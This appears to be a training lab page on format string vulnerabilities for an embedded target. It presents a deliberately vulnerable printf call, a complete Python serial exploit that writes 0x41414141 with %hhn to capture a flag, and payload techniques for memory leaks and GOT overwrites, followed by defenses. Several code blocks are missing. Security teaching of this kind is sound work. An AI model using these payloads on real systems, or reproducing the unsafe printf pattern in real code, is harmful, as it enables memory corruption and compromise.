Lab 02: Format String Vulnerability¶
Introduction¶
Format string vulnerabilities represent a unique class of memory corruption bugs that shocked the security community when discovered in 2000. Unlike buffer overflows that require sequential memory corruption, format strings provide surgical precision for reading and writing arbitrary memory.
Difficulty: Medium
Category: Memory Corruption
Historical Context: WU-FTPD 2.6.0 (June 2000)
Learning Objectives¶
By completing this lab, you will:
- Understand how printf format strings work internally
- Master format string exploitation techniques
- Learn to read and write arbitrary memory
- Develop precision memory corruption skills
- Appreciate secure coding practices for output functions
Historical Background¶
The WU-FTPD Discovery (2000)¶
In June 2000, a researcher known as "tf8" posted about a critical vulnerability in WU-FTPD 2.6.0, one of the most popular FTP servers. The bug was deceptively simple:
This discovery revealed an entire class of vulnerabilities hiding in plain sight. Within weeks, format string bugs were found in:
- Linux rpc.statd (Ramen worm, 2001)
- Various telnetd implementations
- Logging daemons across platforms
- Embedded device interfaces
Why Format Strings Shocked Security Researchers¶
- Ubiquitous: Printf-family functions everywhere
- Powerful: Read/write memory without overflow
- Subtle: Easy to introduce, hard to spot
- Precise: Byte-level memory manipulation
Vulnerability Overview¶
How Printf Works¶
Printf processes format specifiers to display variables:
Format specifiers tell printf how to interpret arguments:
%d- Integer from next argument%x- Hexadecimal from next argument%s- String from pointer in next argument%n- Write bytes printed to address in next argument
The Vulnerability¶
When user controls the format string:
They control how printf interprets the stack:
%x- Read stack values%s- Read from arbitrary addresses%n- Write to arbitrary addresses
Lab Setup¶
Prerequisites¶
- Completed Lab 01 (Buffer Overflow)
- Understanding of printf internals
- Python 3 with pwntools recommended
Getting Started¶
-
Build and flash the vulnerable binary:
-
Connect to the target:
-
Explore the application:
Understanding the Target¶
Application Overview¶
The system is an "activity logger" with:
- Logging Function: Vulnerable printf call
- Authentication Check: Requires specific value in memory
- Debug Hints: Shows important addresses
- Stack Canary: Monitors for corruption
The Vulnerable Code¶
void log_activity(char *user_input)
{
embsec_printf("Activity logged: ");
embsec_printf(user_input); // FORMAT STRING BUG!
embsec_printf("\n");
}
The Goal¶
Set the authenticated variable to 0x41414141 to get the flag.
Vulnerability Analysis¶
Step 1: Confirm the Vulnerability¶
Test with format specifiers:
Success! We're reading stack values.
Step 2: Information Gathering¶
Use option 3 for hints:
=== System Information ===
Stack canary: 0xDEADBEEF (watching for corruption)
Auth variable: 0x20000C00 (current value: 0x00000000)
Auth success value: 0x41414141
Critical information:
- Target address:
0x20000C00 - Required value:
0x41414141 - Stack canary present (but irrelevant for format strings)
Step 3: Find Input Position¶
Locate our input on the stack:
Enter activity to log: AAAA %x %x %x %x %x %x
Activity logged: AAAA 20000800 deadbeef 64 20000810 0 41414141
Our input "AAAA" (0x41414141) is at position 6!
Step 4: Direct Parameter Access¶
Verify using direct parameter access:
Perfect! We can reference our input directly.
Format String Techniques¶
1. Memory Reading¶
Reading Stack Values:
%x %x %x %x # Read 4 stack values
%6$x # Read 6th parameter directly
%100x # Read with width (padding)
Reading Arbitrary Memory:
# Place address on stack, use %s to dereference
addr = 0x20000100
payload = struct.pack('<I', addr)
payload += b'%6$s' # Read string from addr
2. Memory Writing¶
The %n Specifier:
- Writes number of bytes printed so far
- Takes address from stack parameter
- Variants:
%n(4 bytes),%hn(2 bytes),%hhn(1 byte)
Basic Write:
# Write value 100 to address
payload = struct.pack('<I', target_addr)
payload += b'%96x' # Print 96 more chars (total 100)
payload += b'%6$n' # Write 100 to target_addr
3. Precision Writing¶
For exact values, use width specifiers:
# Write 0x41 to single byte
payload = struct.pack('<I', target)
# Already printed 4 bytes (address)
payload += b'%61c' # Print 61 chars (total 65 = 0x41)
payload += b'%6$hhn' # Write single byte
Exploitation¶
Understanding the Target Value¶
We need to write 0x41414141:
- 4 bytes, each containing
0x41 - Decimal value: 65 (
'A'in ASCII)
Exploitation Strategy¶
Write each byte separately using %hhn:
- Place 4 addresses on stack (target+0, +1, +2, +3)
- Use width specifiers to control bytes printed
- Write 0x41 to each address sequentially
Building the Exploit¶
#!/usr/bin/env python3
import struct
import serial
import time
# Target configuration
target_addr = 0x20000C00
target_value = 0x41414141
# Serial setup
ser = serial.Serial('/dev/ttyACM0', 115200, timeout=1)
def send_command(cmd):
ser.write(cmd.encode() + b'\n')
time.sleep(0.1)
# Navigate to log activity
send_command('1')
# Build format string payload
payload = b''
# Place 4 addresses on stack
for i in range(4):
payload += struct.pack('<I', target_addr + i)
# We've printed 16 bytes (4 addresses * 4 bytes each)
# Need to print 65 total for 0x41
# First byte: need 65 - 16 = 49 more
payload += b'%49c%6$hhn'
# Subsequent bytes: already at 65, just write
payload += b'%7$hhn'
payload += b'%8$hhn'
payload += b'%9$hhn'
# Send exploit
ser.write(payload + b'\n')
# Check authentication
time.sleep(0.5)
send_command('2')
# Read flag
response = ser.read(2000)
print(response.decode('latin-1'))
Manual Exploitation Steps¶
-
Calculate addresses:
-
Build payload:
-
Execute:
- Select option 1
- Paste payload
- Select option 2
- Get flag!
Expected Result¶
Choice: 2
ACCESS GRANTED!
Flag: embsec{f0rm4t_str1ng_wr1t3_4cc3ss}
Critical system compromise detected!
Advanced Techniques¶
1. Large Value Writes¶
Writing large values efficiently:
# Write 0xdeadbeef
# Split into: 0xde, 0xad, 0xbe, 0xef
# Order by value: 0xad, 0xbe, 0xde, 0xef
values = [(0xad, 1), (0xbe, 2), (0xde, 0), (0xef, 3)]
values.sort()
payload = b''
# Place addresses
for _, offset in values:
payload += struct.pack('<I', target + offset)
printed = 16
for value, offset in values:
needed = value - printed
if needed > 0:
payload += f'%{needed}c'.encode()
payload += f'%{6+offset}$hhn'.encode()
printed = value
2. GOT Overwrite¶
Overwrite Global Offset Table entries:
# Find GOT entry
got_printf = 0x20001234
# Overwrite with shellcode address
shellcode_addr = 0x20000500
# Use format string to overwrite GOT
3. Stack Pivot¶
Use format string to modify stack pointer:
4. Information Disclosure¶
Leak critical addresses:
# Leak stack canary
payload = b'%39$x' # Canary often at fixed offset
# Leak return addresses
payload = b'%40$x' # Find saved EIP/LR
# Leak library addresses (bypass ASLR)
payload = struct.pack('<I', got_entry)
payload += b'%6$s' # Dereference GOT
Defensive Measures¶
Immediate Fixes¶
-
Never Use User Input as Format String:
-
Use Format String Literals:
Compiler Protections¶
Enable format string warnings:
Runtime Protections¶
-
FORTIFY_SOURCE:
-
Stack Canaries (limited effectiveness against format strings)
-
RELRO (Relocation Read-Only):
Common Pitfalls¶
1. Parameter Counting¶
Problem: Wrong position for direct parameter access
Solution: Test with AAAA and %x to find position
2. Alignment Issues¶
Problem: Addresses must be word-aligned on ARM
Solution: Ensure target addresses are 4-byte aligned
3. Width Calculation¶
Problem: Incorrect byte counts for %n
Solution: Track bytes printed carefully, including addresses
4. Format String Limits¶
Problem: Some implementations limit width specifiers
Solution: Use multiple writes or find alternatives
Real-World Impact¶
Format string bugs in the wild:
Historical Exploits¶
- 2000: WU-FTPD 2.6.0 remote root
- 2001: Linux rpc.statd (Ramen worm)
- 2002: OpenBSD ftpd
- 2003: Linux kernel vsprintf
Modern Occurrences¶
- 2021: sudo format string in logging
- 2020: Windows Print Spooler
- IoT Devices: Common in embedded systems
- Web Applications: Printf-style template engines
Comparison with Buffer Overflows¶
| Aspect | Buffer Overflow | Format String |
|---|---|---|
| Discovery | Obvious pattern | Subtle mistake |
| Precision | Sequential corruption | Surgical writes |
| Read Capability | Limited | Extensive |
| Write Capability | Sequential | Arbitrary |
| Bypass Protections | Harder | Often easier |
| Complexity | Lower | Higher |
Key Takeaways¶
- Format String Power: Read/write anywhere without overflow
- Always Use %s: Never pass user input as format string
- Compiler Warnings: Enable and heed format warnings
- Defense in Depth: Multiple protections needed
- Code Review: Look for printf-family vulnerabilities
Challenges¶
Challenge 1: Blind Exploitation¶
No debug output - can you still exploit?
- Use %x to map memory
- Find addresses through leaks
- Brute force if necessary
Challenge 2: Limited Input Length¶
Only 32 bytes allowed:
- Use short writes (%hn)
- Multiple exploitation rounds
- Leverage existing values
Challenge 3: ASLR Enabled¶
Randomized addresses:
- Leak base addresses first
- Use relative offsets
- Partial overwrites
Further Reading¶
Technical Papers¶
- Exploiting Format String Vulnerabilities - scut/team teso
- Format String Attacks - Modern guide
- Advanced Format String Exploitation
Historical Documents¶
- tf8's original WU-FTPD advisory
- CERT Advisory CA-2000-13
- Ramen worm analysis
Modern Research¶
- Format string compiler defenses
- Automated vulnerability detection
- Format string fuzzing techniques
Next Steps¶
Congratulations on mastering format string exploitation! You've learned:
- How printf processes format specifiers
- Reading arbitrary memory with %x and %s
- Writing arbitrary memory with %n
- Precision memory corruption techniques
- Why format string bugs are dangerous
Consider exploring:
- Advanced ROP techniques
- Heap exploitation methods
- Integer overflow vulnerabilities
- Race conditions in embedded systems
"With great power comes great responsibility" - Always use format strings safely!